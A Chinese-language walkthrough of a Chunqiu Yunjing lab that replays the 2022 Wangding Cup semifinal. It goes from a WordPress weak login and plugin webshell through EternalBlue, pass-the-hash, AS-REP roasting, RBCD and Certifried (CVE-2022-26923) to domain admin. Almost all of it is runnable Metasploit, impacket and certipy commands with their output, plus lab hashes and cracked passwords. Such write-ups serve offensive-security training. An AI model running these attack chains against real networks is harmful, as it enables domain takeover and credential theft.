春秋云镜-2022网鼎杯半决赛复盘

渗透

春秋云镜-2022网鼎杯半决赛复盘

flag01

fscan扫描

.\fscan -h 39.99.228.226

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.99.228.226:80 open
39.99.228.226:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.228.226      code:200 len:39988  title:XIAORANG.LAB
已完成 2/2
[*] 扫描结束,耗时: 52.9944862s

使用Wappalyzer发现是web服务是wordpress 6.2.6

那先用wpscan扫描一下，没啥发现

1	wpscan --url http://39.99.228.226:80 --enumerate vp,vt,tt,u

扫描目录得到wp-admin，然后admin/123456弱口令登录后台。然后编辑插件

再根据wordpress的目录规则找到木马位置

http://39.99.228.226/wp-content/plugins/akismet/akismet.php

用蚁剑成功连接

flag01: flag{336af0e6-723b-4b56-90bc-eafd0f6caa2c}

flag02

上线Vshell，扫下内网

172.22.15.35:135 open
172.22.15.18:135 open
172.22.15.13:135 open
172.22.15.35:139 open
172.22.15.24:139 open
172.22.15.18:139 open
172.22.15.13:139 open
172.22.15.24:135 open
172.22.15.13:88 open
172.22.15.24:80 open
172.22.15.18:80 open
172.22.15.24:3306 open
172.22.15.26:80 open
172.22.15.26:22 open
172.22.15.24:445 open
172.22.15.18:445 open
172.22.15.13:445 open
172.22.15.35:445 open
[*] NetInfo 
[*]172.22.15.24
   [->]XR-WIN08
   [->]172.22.15.24
[*] NetInfo 
[*]172.22.15.18
   [->]XR-CA
   [->]172.22.15.18
[*] NetBios 172.22.15.35    XIAORANG\XR-0687              
[*] OsInfo 172.22.15.13    (Windows Server 2016 Standard 14393)
[*] NetBios 172.22.15.13    [+] DC:XR-DC01.xiaorang.lab          Windows Server 2016 Standard 14393
[*] NetInfo 
[*]172.22.15.35
   [->]XR-0687
   [->]172.22.15.35
[+] MS17-010 172.22.15.24    (Windows Server 2008 R2 Enterprise 7601 Service Pack 1)
[*] NetInfo 
[*]172.22.15.13
   [->]XR-DC01
   [->]172.22.15.13
[*] NetBios 172.22.15.18    XR-CA.xiaorang.lab                  Windows Server 2016 Standard 14393
[*] NetBios 172.22.15.24    WORKGROUP\XR-WIN08                  Windows Server 2008 R2 Enterprise 7601 Service Pack 1
[*] WebTitle http://172.22.15.26       code:200 len:39962  title:XIAORANG.LAB
[*] WebTitle http://172.22.15.18       code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.22.15.24       code:302 len:0      title:None 跳转url: http://172.22.15.24/www
[+] PocScan http://172.22.15.18 poc-yaml-active-directory-certsrv-detect 
[*] WebTitle http://172.22.15.24/www/sys/index.php code:200 len:135    title:None

小小总结

172.22.15.13 DC

172.22.15.18 XR-CA.xiaorang.lab

172.22.15.24 WORKGROUP\XR-WIN08 Windows Server 2008 R2 Enterprise 7601

172.22.15.26 外网

172.22.15.35 XIAORANG\XR-0687

发现有个Windows Server 2008 R2

直接打永恒之蓝看看

proxychains msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.15.24
exploit

成功了

但是msf一直读不到flag，也拿不到shell

1 2	meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e52d03e9b939997401466a0ec5a9cbc:::

打一个pth来横向

1	proxychains -q python3 wmiexec.py -hashes :0e52d03e9b939997401466a0ec5a9cbc xiaorang.lab/administrator@172.22.15.24 -codec gbk

flag02: flag{44e7697e-f9dc-4afc-86e7-54d15310f01c}

flag03

本来想rdp上去看的，但是报错了。

访问http://172.22.15.24/www/sys/index.php服务，依旧admin/123456弱口令登录

然后后台管理里面，可以导出一堆账号

lixiuying@xiaorang.lab
lixiaoliang@xiaorang.lab
zhangyi@xiaorang.lab
jiaxiaoliang@xiaorang.lab
zhangli@xiaorang.lab
zhangwei@xiaorang.lab
liuqiang@xiaorang.lab
wangfang@xiaorang.lab
wangwei@xiaorang.lab
wanglihong@xiaorang.lab
huachunmei@xiaorang.lab
wanghao@xiaorang.lab
zhangxinyu@xiaorang.lab
huzhigang@xiaorang.lab
lihongxia@xiaorang.lab
wangyulan@xiaorang.lab
chenjianhua@xiaorang.lab

然后打一个AS-ERP Roasting

1	proxychains -q impacket-GetNPUsers -dc-ip 172.22.15.13 -usersfile usernames.txt xiaorang.lab/

跑到两个哈希

1
2

$krb5asrep$23$lixiuying@xiaorang.lab@XIAORANG.LAB:446c1896086281087832a8e2a7738c6c$d566cd98b0f19a8c28b113f40b0ad5a6861be2756e5793df1f937af73d4c499f64bf607027f2e12544807905f6fa9ff2a045fec8f9b0fafa706327ef3d76ef41dbe48d3bece3db903b0dae1f52b46f35441b32c0448e42c003a53c6c8b72815f4d4e4512e2ecda083e9050898008944d59f54c64c3a7b6d39fb2d8f5c32b399ee34325d0a085f193056f1651e8713fed7099b970377277c88be436c1b612a85cc86d2e6f41a470bf175481c8da0ad0ea83c63d4fc6c58ec33ebdaa4f3ac23b1ee6c86d77acc3e12c053bfcd0453ee10d886e5c09c10a26db216b3182d5607a844064eb78cdac91b07f01ef46
$krb5asrep$23$huachunmei@xiaorang.lab@XIAORANG.LAB:0d527c19a056b9e19e9f5665276e3f3a$61d8bb4122b0dd7c1d4c7ae60890e7622a4b3888ebbb64b4bed37f124ec3948b151a31d9d9861e7e7281f0b048d6a1d26cba65ae9fbe62d45238bd282ab0bc0540f6c52d1cf8ec4a2223d0780ce1d48765963821b15e0a7f6355fe46541ca39b43a5ab81fae0783ea3f90774514364242b8f04f3911051735e485df1f25de35ea752bba7f878e49a6f4c74a7b2969c6d8cda5e9df0e4f723372aadf1fb85ab4188e8980b8b448f3d382a2a069e1212a96a4389510d22d2cec725737ae485b549d10a6840b7c64f1c5581b01760ff77854114a7c397ad5cdb1737fef537c7181ee53c6ae4a9c5b2a166a2da78

用hashcat爆破一下。

1 2	lixiuying:winniethepooh huachunmei:1qaz2wsx

用跑出来的名字做域信息收集

1	proxychains -q bloodhound-python -u lixiuying -p winniethepooh -d xiaorang.lab -c all -ns 172.22.15.13 --zip --dns-tcp

发现域用户 LIXIUYING 对计算机 XR-0687$ 具有 Generic Write 权限。bloodhound里面说了这个可以打RBCD

打一个RBCD。详情可以看春秋云镜-Flarum

改host

1
2
3

172.22.15.35 XR-0687.xiaorang.lab
172.22.15.13 XR-DC01.xiaorang.lab
172.22.15.18 XR-CA.xiaorang.lab

添加机器账号

1	proxychains -q impacket-addcomputer xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -dc-host xiaorang.lab -computer-name 'hacker$' -computer-pass 'Password@973'

修改msDS-AllowedToActOnBehalfOfOtherIdentity

1	proxychains -q impacket-rbcd xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'hacker$'

这一步报错了[-] unsupported hash type MD4

查了一下好像是conda安装的python有点问题，改成我使用conda之前的python成功执行

1	proxychains -q python3.13 rbcd.py xiaorang.lab/lixiuying:'winniethepooh' -dc-ip 172.22.15.13 -action write -delegate-to 'XR-0687$' -delegate-from 'hacker$'

申请票据

1	proxychains -q impacket-getST xiaorang.lab/'hacker$':'Password@973' -spn cifs/XR-0687.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13

导入票据

1	export KRB5CCNAME=Administrator@cifs_XR-0687.xiaorang.lab@XIAORANG.LAB.ccache

然后打PTT拿flag

1	proxychains -q python smbexec.py -no-pass -k XR-0687.xiaorang.lab

flag03: flag{01fa7242-bc72-4842-8f0d-f894205e9d81}

flag04

一开始fscan扫内网的时候有poc-yaml-active-directory-certsrv-detect。查一下证书

1	proxychains -q certipy-ad find -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -vulnerable -stdout

又是CVE-2022-26923 （Certifried）。可以跟着MagicRelay机器那样打。详情可以看春秋云镜-MagicRelay

创建账号，并将该机器账户 dNSHostName 属性指向域控：

1	proxychains -q certipy-ad account create -u lixiuying@xiaorang.lab -p winniethepooh -dc-ip 172.22.15.13 -user citrus -dns XR-DC01.xiaorang.lab -debug

申请Machine证书（这里得执行两次

1	proxychains -q certipy-ad req -u 'citrus$@xiaorang.lab' -p '5L0GV5vItnNirHOc' -ca 'xiaorang-XR-CA-CA' -target 172.22.15.18 -dc-ip 172.22.15.13 -template 'Machine' -debug

尝试直接拿域管哈希（依旧报错了）

1	proxychains -q certipy-ad auth -pfx xr-dc01.pfx -dc-ip 172.22.15.13

选择从证书里面转储crt和key

1 2	certipy-ad cert -pfx xr-dc01.pfx -nokey -out xr-dc01.crt certipy-ad cert -pfx xr-dc01.pfx -nocert -out xr-dc01.key

改msDS-AllowedToActOnBehalfOfOtherIdentity

1	proxychains -q python passthecert.py -action write_rbcd -crt xr-dc01.crt -key xr-dc01.key -domain xiaorang.lab -dc-ip 172.22.15.13 -delegate-to 'XR-DC01$' -delegate-from 'citrus$'

申请票据

1	proxychains -q impacket-getST xiaorang.lab/'citrus$':'5L0GV5vItnNirHOc' -spn cifs/XR-DC01.xiaorang.lab -impersonate Administrator -dc-ip 172.22.15.13

导入票据

1 2	unset KRB5CCNAME export KRB5CCNAME=Administrator@cifs_XR-DC01.xiaorang.lab@XIAORANG.LAB.ccache

PTT

1	proxychains -q python smbexec.py -no-pass -k XR-DC01.xiaorang.lab

flag04: flag{962a1c5c-b9d8-4c8d-b23f-32d3fcd9aab0}

参考文章

2022网鼎杯半决赛复盘 - 春秋云境 | h0ny’s blog

春秋云境 - 2022 网鼎杯半决赛复盘 | 心流